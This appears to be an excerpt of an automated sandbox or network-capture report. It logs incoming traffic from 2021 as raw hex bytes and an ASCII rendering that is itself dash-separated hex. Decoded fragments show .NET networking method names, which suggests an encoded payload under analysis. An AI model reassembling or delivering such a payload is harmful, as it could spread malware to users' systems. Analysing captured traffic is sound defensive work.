2021-09-14 19:24:32 UTC	192	IN	Data Raw: 34 35 37 37 34 33 36 36 36 35 32 36 32 36 35 35 37 36 46 37 38 33 31 37 35 34 45 33 33 37 36 36 36 35 33 35 2d 33 35 37 36 35 46 35 37 35 46 37 37 36 33 33 44 2d 2d 32 33 33 44 37 31 33 2d 35 2d 34 44 36 33 35 38 35 31 34 41 37 38 36 33 34 43 34 43 37 32 33 31 37 33 35 39 34 46 33 2d 36 36 37 2d 37 39 36 38 35 2d 36 41 35 35 37 37 36 41 35 31 37 34 34 39 36 45 34 43 35 46 37 36 34 41 35 2d 35 31 35 33 36 37 34 33 37 33 36 36 36 39 36 46 33 44 2d 2d 32 33 33 44 37 31 34 38 36 31 37 35 36 39 36 41 36 44 36 38 33 32 36 45 34 41 33 35 36 42 34 38 34 46 33 36 36 36 35 34 35 39 34 32 36 45 34 41 34 36 35 41 34 42 36 42 36 36 37 41 36 42 35 37 37 34 33 35 36 37 34 32 33 34 36 44 35 39 35 33 33 35 34 46 34 43 34 46 35 36 36 33 33 44 2d 2d 32 33 33 44 37 31 37 2d Data Ascii: 457743666526265576F7831754E337666535-35765F575F77633D--233D713-5-4D6358514A78634C4C723173594F3-667-79685-6A55776A5174496E4C5F764A5-515367437366696F3D--233D71486175696A6D68326E4A356B484F36665459426E4A465A4B6B667A6B5774356742346D5953354F4C4F56633D--233D717-
2021-09-14 19:24:32 UTC	199	IN	Data Raw: 38 36 31 34 35 35 37 36 45 33 39 37 39 35 41 36 39 34 39 37 39 36 34 34 35 34 33 36 36 33 36 33 39 32 34 36 42 37 34 36 41 33 2d 34 39 35 2d 34 34 33 35 37 37 34 31 37 37 34 33 33 32 34 38 33 35 34 33 36 33 33 38 34 33 32 34 34 43 2d 2d 32 33 33 44 37 31 37 31 37 33 33 31 36 44 36 46 34 46 32 34 36 44 35 39 36 31 35 33 33 37 33 32 34 46 35 38 34 46 35 37 36 35 33 2d 35 41 33 36 34 37 37 39 36 33 37 33 36 43 34 35 36 32 33 36 36 35 33 39 34 39 37 2d 36 46 37 39 33 37 37 2d 37 2d 35 37 33 2d 34 46 33 35 36 31 36 32 34 39 37 2d 33 2d 33 35 36 31 36 41 37 36 33 38 36 34 36 46 37 31 36 34 34 41 35 41 34 38 36 43 34 45 33 33 36 33 34 42 2d 2d 32 33 33 44 37 31 37 39 34 35 34 38 33 35 33 34 34 39 35 37 32 34 36 36 33 39 36 36 35 35 34 41 36 32 33 37 34 36 34 46 Data Ascii: 86145576E39795A694979644543663639246B746A3-495-44357741774332483543633843244C--233D717173316D6F4F246D59615337324F584F57653-5A36477963736C4562366539497-6F79377-7-573-4F356162497-3-35616A7638646F71644A5A486C4E33634B--233D717945483534495724663966554A6237464F
2021-09-14 19:24:32 UTC	207	IN	Data Raw: 35 36 34 36 44 34 37 34 31 33 44 2d 2d 32 33 33 44 37 31 34 36 36 43 37 41 32 34 32 34 37 36 36 38 36 43 37 32 36 45 35 41 36 32 33 37 35 39 34 46 36 41 36 39 33 2d 36 35 34 36 35 46 35 31 35 41 34 32 37 41 36 42 34 46 36 31 36 41 35 34 33 2d 37 37 33 33 35 35 36 46 35 31 36 32 36 37 36 45 35 38 35 36 34 39 34 31 33 44 2d 2d 32 33 33 44 37 31 36 39 36 42 34 32 35 38 35 46 34 33 36 44 35 33 32 34 35 41 37 41 35 36 34 31 37 35 37 31 32 34 36 45 35 31 34 41 34 32 34 34 37 37 36 44 34 43 36 44 33 35 34 37 36 35 36 35 33 31 36 39 35 2d 36 43 35 2d 37 35 37 36 34 39 33 31 33 38 33 38 34 35 36 41 36 46 33 44 2d 2d 32 33 33 44 37 31 34 39 34 46 35 38 35 46 37 32 37 37 34 38 37 32 35 33 35 46 35 32 34 43 34 36 34 43 33 32 36 39 36 37 37 41 35 32 37 33 35 35 35 31 Data Ascii: 5646D47413D--233D71466C7A242476686C726E5A6237594F6A693-65465F515A427A6B4F616A543-7733556F5162676E585649413D--233D71696B42585F436D53245A7A56417571246E514A4244776D4C6D3547656531695-6C5-757649313838456A6F3D--233D71494F585F72774872535F524C464C3269677A52735551
2021-09-14 19:24:32 UTC	214	IN	Data Raw: 44 37 31 36 34 33 38 35 37 34 39 35 41 34 46 33 38 36 36 33 36 34 39 35 32 37 31 36 34 35 35 36 44 37 36 37 38 36 31 37 37 36 41 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 34 39 35 41 35 2d 33 38 34 39 35 38 33 36 33 2d 36 37 35 33 35 39 34 36 33 38 33 32 36 42 37 35 35 41 36 35 36 41 36 44 36 37 33 38 37 2d 34 46 36 46 35 38 36 36 34 35 34 32 36 33 37 41 36 31 37 2d 35 34 35 34 37 37 36 37 37 32 35 37 34 44 32 34 36 36 34 44 33 44 2d 2d 32 33 33 44 37 31 35 35 35 32 34 39 37 38 34 44 34 46 34 37 33 2d 34 38 34 39 36 44 37 37 34 35 35 2d 33 34 34 31 33 36 37 41 34 35 36 39 35 2d 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 35 33 31 36 37 33 36 36 44 33 31 34 33 36 39 34 41 33 35 37 39 37 41 34 43 34 35 34 33 36 46 37 38 33 31 36 38 34 32 37 32 37 37 Data Ascii: D71643857495A4F38663649527164556D767861776A31773D3D--233D71495A5-384958363-6753594638326B755A656A6D67387-4F6F58664542637A617-5454776772574D24664D3D--233D71555249784D4F473-48496D77455-3441367A45695-673D3D--233D71553167366D3143694A35797A4C45436F783168427277
2021-09-14 19:24:32 UTC	221	IN	Data Raw: 45 33 39 36 45 33 34 36 36 34 42 34 31 37 33 37 36 35 37 35 34 33 39 36 33 36 39 37 33 36 31 34 38 35 34 35 46 35 2d 36 37 37 36 36 33 34 37 34 31 34 45 36 45 36 34 33 36 36 46 33 44 2d 2d 32 33 33 44 37 31 34 42 33 35 34 44 36 36 33 39 37 35 37 38 34 34 34 33 36 41 37 37 34 34 35 32 36 36 37 39 34 41 35 31 33 36 36 42 37 2d 33 38 34 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 36 35 41 33 38 37 38 36 44 33 36 33 39 34 33 36 34 33 2d 34 33 33 35 33 35 34 39 37 2d 33 32 34 46 35 32 36 36 33 37 34 45 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 36 35 38 34 32 35 46 37 39 33 33 36 35 34 45 35 46 37 33 37 2d 33 31 32 34 34 44 36 34 33 39 35 35 36 46 34 41 36 35 35 39 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 33 33 37 36 41 36 36 36 33 36 35 34 34 37 2d 37 36 Data Ascii: E396E34664B4173765754396369736148545F5-67766347414E6E64366F3D--233D714B354D6639757844436A77445266794A51366B7-38413D3D--233D71465A38786D363943643-433535497-324F5266374E673D3D--233D715658425F7933654E5F737-31244D6439556F4A6559513D3D--233D7133376A666365447-76
2021-09-14 19:24:32 UTC	228	IN	Data Raw: 33 36 35 36 39 37 36 36 35 34 31 37 33 37 39 36 45 36 33 2d 2d 36 37 36 35 37 34 35 46 35 33 36 46 36 33 36 42 36 35 37 34 34 35 37 32 37 32 36 46 37 32 2d 2d 36 37 36 35 37 34 35 46 34 43 36 31 37 33 37 34 34 46 37 2d 36 35 37 32 36 31 37 34 36 39 36 46 36 45 2d 2d 36 37 36 35 37 34 35 46 34 32 37 39 37 34 36 35 37 33 35 34 37 32 36 31 36 45 37 33 36 36 36 35 37 32 37 32 36 35 36 34 2d 2d 36 37 36 35 37 34 35 46 34 32 37 35 36 36 36 36 36 35 37 32 2d 2d 35 32 36 35 37 33 36 39 37 41 36 35 2d 2d 34 33 36 46 36 43 36 43 36 35 36 33 37 34 2d 2d 36 37 36 35 37 34 35 46 34 46 36 36 36 36 37 33 36 35 37 34 2d 2d 35 33 36 35 36 45 36 34 34 31 37 33 37 39 36 45 36 33 2d 2d 35 2d 37 34 37 32 35 34 36 46 35 33 37 34 37 32 37 35 36 33 37 34 37 35 37 32 36 35 2d 2d Data Ascii: 3656976654173796E63--6765745F536F636B65744572726F72--6765745F4C6173744F7-65726174696F6E--6765745F42797465735472616E73666572726564--6765745F427566666572--526573697A65--436F6C6C656374--6765745F4F6666736574--53656E644173796E63--5-7472546F537472756374757265--
2021-09-14 19:24:32 UTC	236	IN	Data Raw: 2d 31 32 38 32 37 44 2d 38 32 2d 2d 33 31 44 2d 35 31 44 2d 35 2d 38 2d 38 2d 35 2d 37 2d 31 31 32 38 31 31 39 2d 35 32 2d 2d 32 2d 31 2d 45 2d 32 2d 35 2d 37 2d 33 2d 32 2d 38 2d 38 2d 37 32 2d 2d 33 2d 31 2d 32 2d 45 31 2d 2d 32 2d 34 2d 2d 2d 31 2d 31 2d 38 2d 38 2d 37 2d 32 31 32 38 2d 45 35 31 32 38 31 31 39 2d 38 2d 2d 2d 31 31 32 38 2d 45 31 31 32 38 2d 45 35 2d 37 2d 37 2d 35 2d 45 2d 45 2d 45 2d 45 2d 45 2d 35 2d 2d 2d 2d 31 32 38 32 42 35 2d 35 32 2d 2d 31 2d 45 31 44 2d 35 2d 38 2d 2d 2d 33 2d 32 2d 45 2d 45 31 31 38 32 42 31 2d 35 32 2d 2d 32 2d 45 2d 45 2d 45 2d 36 2d 2d 2d 31 2d 32 31 32 38 32 45 31 2d 35 2d 37 2d 32 2d 32 31 32 33 35 2d 33 2d 36 31 32 33 35 2d 36 32 2d 2d 32 31 32 33 35 2d 45 2d 32 2d 34 2d 2d 2d 31 2d 38 31 43 2d 36 2d 37 Data Ascii: -12827D-82--31D-51D-5-8-8-5-7-1128119-52--2-1-E-2-5-7-3-2-8-8-72--3-1-2-E1--2-4---1-1-8-8-7-2128-E5128119-8---1128-E1128-E5-7-7-5-E-E-E-E-E-5----1282B5-52--1-E1D-5-8---3-2-E-E1182B1-52--2-E-E-E-6---1-21282E1-5-7-2-21235-3-61235-62--21235-E-2-4---1-81C-6-7
2021-09-14 19:24:32 UTC	243	IN	Data Raw: 44 42 35 32 38 35 39 41 45 33 45 43 36 41 41 34 41 37 36 41 34 42 46 43 38 34 35 34 32 41 45 33 34 33 43 2d 32 44 31 44 36 42 36 43 37 35 42 38 39 42 38 33 32 46 44 38 35 35 34 41 36 31 42 37 37 41 43 33 37 34 43 32 46 35 2d 2d 41 35 41 35 33 34 33 45 37 37 35 31 32 41 42 35 32 33 32 44 38 39 39 36 41 36 43 44 39 39 37 46 44 42 36 2d 35 45 36 37 41 39 2d 36 39 33 34 41 45 32 31 41 42 44 36 37 37 35 2d 31 43 36 45 44 32 42 41 38 36 35 32 46 41 2d 46 31 35 42 36 2d 46 2d 32 37 31 46 35 45 41 41 32 2d 35 44 43 31 45 35 2d 32 45 37 34 44 31 39 44 38 38 39 36 46 2d 44 42 38 41 38 2d 34 37 36 32 36 2d 34 35 41 36 31 37 34 41 32 33 37 44 37 35 46 39 31 41 39 41 36 45 45 42 43 35 38 2d 45 35 31 42 43 2d 32 37 36 2d 41 32 44 35 2d 2d 42 38 31 43 37 33 43 35 31 43 Data Ascii: DB52859AE3EC6AA4A76A4BFC84542AE343C-2D1D6B6C75B89B832FD8554A61B77AC374C2F5--A5A5343E77512AB5232D8996A6CD997FDB6-5E67A9-6934AE21ABD6775-1C6ED2BA8652FA-F15B6-F-271F5EAA2-5DC1E5-2E74D19D8896F-DB8A8-47626-45A6174A237D75F91A9A6EEBC58-E51BC-276-A2D5--B81C73C51C
2021-09-14 19:24:32 UTC	250	IN	Data Raw: 32 38 35 33 33 35 43 44 2d 33 43 45 37 33 35 37 37 36 37 35 46 37 34 32 2d 42 2d 32 45 37 34 42 33 43 45 38 42 32 36 37 37 45 37 34 36 36 2d 31 43 31 37 34 37 37 34 38 42 45 43 36 37 35 31 42 42 2d 41 32 43 42 42 43 44 38 33 42 38 35 31 34 32 37 37 41 37 37 44 41 33 2d 43 32 45 32 37 33 36 38 38 44 41 37 37 44 45 44 32 33 45 37 36 45 34 44 44 43 43 32 31 43 42 2d 33 31 39 33 39 45 39 34 42 41 42 33 39 46 44 2d 39 33 42 43 32 39 35 44 42 45 45 37 39 41 46 34 34 37 41 37 37 35 38 43 37 32 45 35 41 32 44 42 41 2d 37 42 45 38 46 41 32 31 36 41 43 32 33 38 46 33 41 44 36 32 46 32 46 45 42 32 46 42 33 2d 2d 35 45 42 46 39 44 43 42 42 34 37 32 46 43 38 2d 31 41 44 43 35 2d 34 45 41 33 45 31 32 39 43 46 2d 32 36 43 2d 36 39 31 43 38 39 42 42 2d 37 37 34 34 34 46 Data Ascii: 285335CD-3CE73577675F742-B-2E74B3CE8B2677E7466-1C1747748BEC6751BB-A2CBBCD83B8514277A77DA3-C2E273688DA77DED23E76E4DDCC21CB-31939E94BAB39FD-93BC295DBEE79AF447A7758C72E5A2DBA-7BE8FA216AC238F3AD62F2FEB2FB3--5EBF9DCBB472FC8-1ADC5-4EA3E129CF-26C-691C89BB-77444F
2021-09-14 19:24:32 UTC	257	IN	Data Raw: 34 37 42 45 34 2d 38 46 33 43 45 42 44 46 32 38 45 41 39 45 36 39 32 36 38 34 37 35 46 45 45 39 43 46 44 33 34 46 37 44 2d 44 31 46 34 2d 38 33 2d 31 46 37 35 32 31 46 36 37 32 39 42 37 36 41 46 2d 32 46 42 46 36 39 35 31 43 31 34 36 44 2d 45 37 33 32 33 31 45 38 44 2d 35 39 37 32 43 43 38 33 2d 41 31 33 33 33 43 37 2d 45 44 32 43 35 32 32 38 37 2d 46 46 2d 31 36 38 41 34 32 38 34 44 2d 34 44 41 39 38 41 39 43 45 38 31 33 34 36 39 32 33 43 43 39 34 35 32 38 45 33 32 39 38 36 32 35 33 39 34 37 35 41 33 43 34 45 41 36 41 33 45 2d 33 34 46 33 2d 34 33 31 39 32 31 36 33 35 32 2d 44 38 2d 39 39 33 37 31 36 39 33 46 36 43 43 43 38 46 33 45 39 33 32 35 44 35 39 32 32 42 35 37 44 33 36 2d 39 43 41 36 36 35 37 44 2d 43 46 34 42 31 36 46 43 34 39 2d 33 38 44 37 38 Data Ascii: 47BE4-8F3CEBDF28EA9E69268475FEE9CFD34F7D-D1F4-83-1F7521F6729B76AF-2FBF6951C146D-E73231E8D-5972CC83-A1333C7-ED2C52287-FF-168A4284D-4DA98A9CE81346923CC94528E329862539475A3C4EA6A3E-34F3-4319216352-D8-99371693F6CCC8F3E9325D5922B57D36-9CA6657D-CF4B16FC49-38D78
2021-09-14 19:24:32 UTC	264	IN	Data Raw: 37 46 36 2d 33 35 36 38 2d 31 35 39 38 37 35 34 37 31 46 43 35 2d 41 46 37 2d 42 2d 32 46 43 38 44 45 39 35 34 2d 42 35 45 41 34 43 44 45 35 41 36 34 37 39 35 32 31 34 2d 33 45 2d 46 37 34 42 41 31 41 45 34 45 46 39 37 34 44 46 39 36 32 46 32 31 33 45 42 33 43 2d 41 42 32 46 46 39 37 36 32 39 37 34 35 33 36 45 42 39 35 43 43 45 44 31 31 45 45 39 41 31 35 41 31 38 43 45 43 33 2d 38 44 41 38 43 34 46 2d 44 42 45 42 39 44 37 44 34 41 45 36 36 46 37 31 33 34 43 44 41 33 43 46 31 42 43 38 33 2d 2d 32 36 43 39 34 34 2d 35 43 31 43 42 43 32 46 32 33 43 42 43 37 42 41 33 32 39 43 45 46 39 38 37 33 45 2d 32 45 42 38 36 45 34 39 45 44 41 33 32 37 36 34 36 46 34 44 39 43 42 45 35 31 45 46 36 35 45 38 31 31 38 41 42 46 41 32 42 43 41 32 44 38 38 31 42 44 42 42 42 38 Data Ascii: 7F6-3568-159875471FC5-AF7-B-2FC8DE954-B5EA4CDE5A64795214-3E-F74BA1AE4EF974DF962F213EB3C-AB2FF9762974536EB95CCED11EE9A15A18CEC3-8DA8C4F-DBEB9D7D4AE66F7134CDA3CF1BC83--26C944-5C1CBC2F23CBC7BA329CEF9873E-2EB86E49EDA327646F4D9CBE51EF65E8118ABFA2BCA2D881BDBBB8
2021-09-14 19:24:32 UTC	272	IN	Data Raw: 42 33 37 36 46 35 41 36 2d 41 42 46 32 46 43 35 33 45 31 32 33 39 44 37 36 43 45 34 45 33 42 33 35 31 43 42 32 39 41 32 2d 41 36 31 35 37 38 44 38 2d 41 43 46 33 2d 37 42 32 41 2d 46 45 41 2d 2d 31 34 35 46 38 41 37 44 42 36 35 38 41 36 42 43 39 39 43 35 37 35 41 31 2d 37 37 33 46 46 36 2d 45 32 39 37 32 31 41 2d 45 45 41 42 34 44 32 41 33 33 35 41 2d 34 32 41 37 41 42 43 41 39 44 33 39 41 36 34 32 35 33 32 34 42 35 35 38 36 46 39 45 42 32 43 33 42 31 34 42 38 2d 31 2d 39 34 37 43 34 38 35 35 43 45 36 32 39 31 35 46 42 37 41 43 2d 44 31 31 33 36 35 38 36 41 45 31 31 44 34 43 36 41 39 32 31 2d 31 45 42 31 33 43 45 45 45 43 43 33 32 2d 38 33 2d 36 33 31 45 33 38 45 31 37 41 38 41 32 43 36 2d 39 34 35 44 36 36 36 41 39 32 39 44 36 31 2d 45 32 36 34 38 31 45 Data Ascii: B376F5A6-ABF2FC53E1239D76CE4E3B351CB29A2-A61578D8-ACF3-7B2A-FEA--145F8A7DB658A6BC99C575A1-773FF6-E29721A-EEAB4D2A335A-42A7ABCA9D39A6425324B5586F9EB2C3B14B8-1-947C4855CE62915FB7AC-D1136586AE11D4C6A921-1EB13CEEECC32-83-631E38E17A8A2C6-945D666A929D61-E26481E
2021-09-14 19:24:32 UTC	279	IN	Data Raw: 39 35 2d 36 31 34 44 41 44 41 37 33 35 31 35 31 45 39 32 32 44 42 46 46 31 36 2d 2d 34 35 36 42 41 44 43 44 46 35 45 39 41 2d 42 43 38 33 37 38 43 32 45 38 41 39 34 46 31 38 32 44 43 31 45 33 36 37 31 37 44 34 37 33 37 34 39 36 34 31 38 35 46 38 41 41 2d 33 45 35 46 31 31 44 34 44 41 37 31 38 33 34 2d 44 2d 46 37 32 44 39 37 34 45 33 37 44 35 37 39 33 36 34 41 35 32 42 35 35 39 44 32 42 32 37 43 31 46 37 43 46 38 42 2d 33 42 38 44 32 31 32 39 38 37 41 41 34 39 33 43 34 38 36 41 2d 41 37 44 32 2d 37 38 44 36 35 38 31 41 39 46 36 38 39 31 33 35 32 2d 36 44 42 37 46 42 35 33 31 38 35 34 39 32 32 44 45 41 45 33 43 39 41 2d 39 36 35 41 31 2d 32 35 41 34 34 39 32 41 43 42 44 34 41 37 43 33 2d 31 41 45 35 33 37 43 42 41 31 35 39 2d 44 2d 2d 38 44 46 44 46 37 31 Data Ascii: 95-614DADA735151E922DBFF16--456BADCDF5E9A-BC8378C2E8A94F182DC1E36717D47374964185F8AA-3E5F11D4DA71834-D-F72D974E37D579364A52B559D2B27C1F7CF8B-3B8D212987AA493C486A-A7D2-78D6581A9F6891352-6DB7FB531854922DEAE3C9A-965A1-25A4492ACBD4A7C3-1AE537CBA159-D--8DFDF71
2021-09-14 19:24:32 UTC	286	IN	Data Raw: 31 41 36 35 45 31 32 45 39 36 35 37 38 43 41 45 46 37 44 39 46 41 36 35 34 32 38 35 32 35 44 2d 43 39 34 46 35 46 38 39 38 41 35 39 41 39 38 36 37 46 35 36 36 46 45 33 41 37 42 35 39 43 33 42 39 44 34 32 38 38 2d 41 44 36 34 37 44 44 41 45 42 45 33 41 37 43 35 38 35 31 2d 44 44 44 33 34 39 39 33 42 38 44 2d 39 39 31 34 31 35 35 42 37 32 41 44 46 33 33 32 39 43 44 38 2d 34 34 32 31 45 31 36 39 45 41 36 38 35 34 42 31 42 41 41 43 35 41 45 46 2d 42 44 34 39 2d 34 45 37 41 38 37 36 44 35 34 34 35 44 42 45 34 39 42 34 33 46 33 39 33 41 37 36 33 44 41 38 33 33 41 43 38 33 41 38 35 43 39 39 31 45 45 45 36 2d 46 36 33 34 34 2d 41 33 42 41 37 39 39 31 46 35 41 34 34 39 37 46 37 43 32 31 41 35 38 45 42 44 43 39 38 46 34 44 34 42 35 46 34 38 33 35 41 41 35 43 45 31 Data Ascii: 1A65E12E96578CAEF7D9FA65428525D-C94F5F898A59A9867F566FE3A7B59C3B9D4288-AD647DDAEBE3A7C5851-DDD34993B8D-9914155B72ADF3329CD8-4421E169EA6854B1BAAC5AEF-BD49-4E7A876D5445DBE49B43F393A763DA833AC83A85C991EEE6-F6344-A3BA7991F5A4497F7C21A58EBDC98F4D4B5F4835AA5CE1
2021-09-14 19:24:32 UTC	293	IN	Data Raw: 34 32 41 38 43 2d 32 33 44 2d 36 45 31 38 37 46 35 42 39 43 36 38 37 42 31 31 35 42 38 36 2d 42 39 33 46 41 44 42 41 38 43 45 37 35 2d 41 32 33 36 2d 35 46 35 43 36 2d 2d 41 46 38 35 42 31 45 42 33 2d 41 38 42 44 46 2d 37 39 35 36 36 43 31 34 2d 38 41 34 33 42 43 2d 32 36 34 44 38 42 33 46 36 39 36 38 31 34 34 33 33 32 32 31 46 42 37 35 45 39 39 31 46 2d 44 45 33 2d 35 35 38 2d 32 37 2d 34 38 44 41 41 43 39 39 46 46 46 34 31 35 46 34 36 41 45 38 39 43 34 2d 44 31 35 44 43 36 2d 2d 33 37 42 44 43 42 43 45 33 38 43 43 43 43 31 35 38 43 2d 44 34 34 32 34 31 32 34 41 39 35 2d 34 39 45 32 44 37 45 44 46 41 37 45 38 41 43 31 45 37 44 31 35 42 41 38 2d 45 35 45 46 43 32 38 33 36 45 33 46 43 39 44 31 41 45 44 43 43 43 31 43 37 44 46 2d 2d 45 45 34 44 37 44 42 36 Data Ascii: 42A8C-23D-6E187F5B9C687B115B86-B93FADBA8CE75-A236-5F5C6--AF85B1EB3-A8BDF-79566C14-8A43BC-264D8B3F696814433221FB75E991F-DE3-558-27-48DAAC99FFF415F46AE89C4-D15DC6--37BDCBCE38CCCC158C-D4424124A95-49E2D7EDFA7E8AC1E7D15BA8-E5EFC2836E3FC9D1AEDCCC1C7DF--EE4D7DB6
2021-09-14 19:24:32 UTC	301	IN	Data Raw: 42 35 38 37 2d 42 36 46 34 46 41 33 41 44 31 38 32 37 2d 38 34 2d 42 33 45 38 37 32 42 43 34 32 38 42 39 33 37 42 34 34 31 36 46 44 2d 31 34 44 38 45 36 39 2d 2d 42 36 32 35 43 31 46 33 32 42 31 45 39 43 44 31 33 32 36 35 33 35 45 36 43 32 46 36 39 32 36 2d 44 35 35 37 33 34 39 43 46 2d 2d 32 36 2d 46 38 45 38 46 2d 41 39 41 41 41 38 43 42 31 2d 42 35 41 37 34 43 33 39 35 38 45 2d 37 36 41 38 2d 39 33 45 31 33 32 31 35 38 41 38 2d 32 42 34 37 39 37 43 2d 2d 44 41 37 33 46 34 33 36 34 39 46 32 42 39 33 42 44 43 36 38 37 35 32 35 31 2d 32 39 39 37 32 39 43 34 46 41 31 42 44 33 43 44 34 31 31 34 39 38 34 32 33 32 38 32 42 37 34 2d 42 39 45 45 33 41 45 2d 37 46 33 35 32 32 33 35 31 39 35 31 31 46 41 33 33 36 46 31 31 34 31 39 34 36 43 35 41 44 33 46 36 34 39 Data Ascii: B587-B6F4FA3AD1827-84-B3E872BC428B937B4416FD-14D8E69--B625C1F32B1E9CD1326535E6C2F6926-D557349CF--26-F8E8F-A9AAA8CB1-B5A74C3958E-76A8-93E132158A8-2B4797C--DA73F43649F2B93BDC6875251-299729C4FA1BD3CD411498423282B74-B9EE3AE-7F35223519511FA336F1141946C5AD3F649
2021-09-14 19:24:32 UTC	308	IN	Data Raw: 39 41 38 32 46 35 2d 45 34 34 46 34 31 42 39 2d 2d 36 45 41 38 41 36 34 39 37 37 45 41 37 44 44 34 45 33 45 37 32 37 35 33 37 35 31 46 2d 41 35 39 45 46 37 43 43 46 39 42 46 36 39 31 45 44 2d 42 45 46 46 36 41 43 39 2d 35 2d 33 35 32 35 45 44 38 45 46 35 46 33 33 46 33 43 44 31 37 41 46 33 43 42 41 37 45 39 35 38 34 36 32 41 33 46 32 2d 44 36 43 39 43 46 31 43 42 42 2d 35 41 41 36 35 35 2d 32 42 46 35 37 2d 42 43 36 45 36 34 35 32 38 44 34 41 45 38 39 33 36 2d 44 38 2d 46 42 33 41 46 32 37 42 42 43 31 32 43 43 36 39 37 41 45 38 36 39 44 34 33 2d 34 32 45 31 2d 41 44 46 36 33 37 33 31 2d 34 46 34 36 38 43 44 44 33 35 2d 39 46 36 39 32 33 45 32 38 46 35 43 42 38 36 39 39 35 36 35 45 37 39 45 33 36 2d 36 43 32 44 42 31 38 34 41 38 32 42 41 32 33 31 32 34 46 Data Ascii: 9A82F5-E44F41B9--6EA8A64977EA7DD4E3E72753751F-A59EF7CCF9BF691ED-BEFF6AC9-5-3525ED8EF5F33F3CD17AF3CBA7E958462A3F2-D6C9CF1CBB-5AA655-2BF57-BC6E64528D4AE8936-D8-FB3AF27BBC12CC697AE869D43-42E1-ADF63731-4F468CDD35-9F6923E28F5CB8699565E79E36-6C2DB184A82BA23124F
2021-09-14 19:24:32 UTC	315	IN	Data Raw: 39 43 38 34 32 34 44 36 41 44 38 39 37 37 44 31 34 37 31 37 36 32 46 41 31 43 34 33 39 41 45 35 32 36 44 32 38 45 43 34 35 2d 41 2d 33 37 45 31 42 41 31 43 39 2d 35 33 31 35 2d 38 32 2d 36 33 39 43 38 46 46 36 36 37 43 31 43 43 39 45 43 33 45 45 33 2d 34 45 38 35 39 35 42 34 38 31 35 33 37 39 32 33 46 35 37 44 33 35 39 37 36 34 41 46 33 43 44 43 43 36 37 39 34 37 39 37 31 43 35 44 38 38 44 38 35 42 34 38 39 43 36 2d 42 36 41 38 2d 44 32 37 33 39 45 45 38 33 37 43 34 36 46 45 35 38 35 45 39 39 44 38 36 36 32 42 37 37 39 32 33 34 36 37 45 44 2d 41 44 42 2d 2d 2d 35 38 38 42 41 32 36 39 39 38 33 37 43 45 2d 32 46 34 43 42 31 35 42 35 33 46 39 37 45 35 45 43 44 45 45 32 45 39 37 33 31 41 46 46 46 43 39 33 35 33 46 41 37 34 43 33 35 39 34 39 35 35 39 31 36 35 Data Ascii: 9C8424D6AD8977D1471762FA1C439AE526D28EC45-A-37E1BA1C9-5315-82-639C8FF667C1CC9EC3EE3-4E8595B481537923F57D359764AF3CDCC67947971C5D88D85B489C6-B6A8-D2739EE837C46FE585E99D8662B77923467ED-ADB---588BA2699837CE-2F4CB15B53F97E5ECDEE2E9731AFFFC9353FA74C35949559165
2021-09-14 19:24:32 UTC	322	IN	Data Raw: 43 33 31 31 42 35 37 38 37 46 43 45 41 42 39 35 35 36 45 35 38 45 36 36 34 32 32 38 38 36 44 32 31 41 36 33 34 38 32 37 42 2d 32 41 39 31 31 41 33 35 31 32 42 34 33 39 35 34 45 36 43 38 33 37 42 35 36 35 2d 36 32 32 35 38 44 34 36 43 36 41 35 36 32 46 45 43 31 37 2d 44 45 32 44 31 31 39 33 32 44 35 43 42 37 2d 32 41 44 41 37 45 41 43 2d 46 34 32 39 45 46 44 45 37 45 38 38 35 35 45 37 34 2d 45 35 37 38 2d 45 31 46 33 45 45 43 46 31 43 41 45 42 45 39 36 38 42 46 42 2d 43 45 38 35 34 46 46 43 44 36 44 43 39 38 32 37 37 42 38 42 35 33 44 35 36 37 32 45 41 45 37 32 39 33 42 39 36 38 45 34 33 46 38 42 42 39 42 39 42 34 45 38 37 43 43 34 45 37 36 35 34 45 41 2d 39 38 33 42 45 31 35 43 45 38 37 39 43 37 33 44 42 35 38 46 35 46 31 36 42 46 46 45 45 33 31 33 45 39 Data Ascii: C311B5787FCEAB9556E58E66422886D21A634827B-2A911A3512B43954E6C837B565-62258D46C6A562FEC17-DE2D11932D5CB7-2ADA7EAC-F429EFDE7E8855E74-E578-E1F3EECF1CAEBE968BFB-CE854FFCD6DC98277B8B53D5672EAE7293B968E43F8BB9B9B4E87CC4E7654EA-983BE15CE879C73DB58F5F16BFFEE313E9
2021-09-14 19:24:32 UTC	330	IN	Data Raw: 34 34 41 34 33 32 38 42 44 2d 33 44 43 32 34 35 32 44 39 42 37 31 46 46 44 43 37 32 32 44 46 39 42 34 34 33 36 46 35 39 33 38 37 35 46 44 32 38 39 44 43 35 38 37 34 34 32 39 31 31 2d 33 44 32 31 38 38 41 46 42 41 42 31 37 43 46 38 34 45 34 2d 45 31 46 43 41 35 33 35 42 44 2d 32 35 35 45 46 39 41 43 2d 35 37 32 45 37 44 45 36 39 42 36 31 2d 34 31 35 37 46 44 44 41 37 43 46 38 32 41 45 42 44 43 41 43 43 33 2d 37 34 41 38 37 38 33 45 44 32 45 2d 45 32 38 38 33 39 46 43 36 31 42 42 37 38 44 41 33 38 43 44 34 34 35 31 36 36 32 45 31 42 37 44 37 39 45 32 45 34 43 35 38 31 44 39 42 32 37 39 46 34 31 35 42 31 39 31 41 2d 35 39 31 44 32 43 38 32 34 43 46 31 41 42 35 2d 39 42 46 31 31 2d 46 36 46 33 45 35 34 33 32 34 37 39 36 37 2d 35 39 39 32 33 34 36 39 45 32 2d Data Ascii: 44A4328BD-3DC2452D9B71FFDC722DF9B4436F593875FD289DC587442911-3D2188AFBAB17CF84E4-E1FCA535BD-255EF9AC-572E7DE69B61-4157FDDA7CF82AEBDCACC3-74A8783ED2E-E28839FC61BB78DA38CD4451662E1B7D79E2E4C581D9B279F415B191A-591D2C824CF1AB5-9BF11-F6F3E543247967-59923469E2-
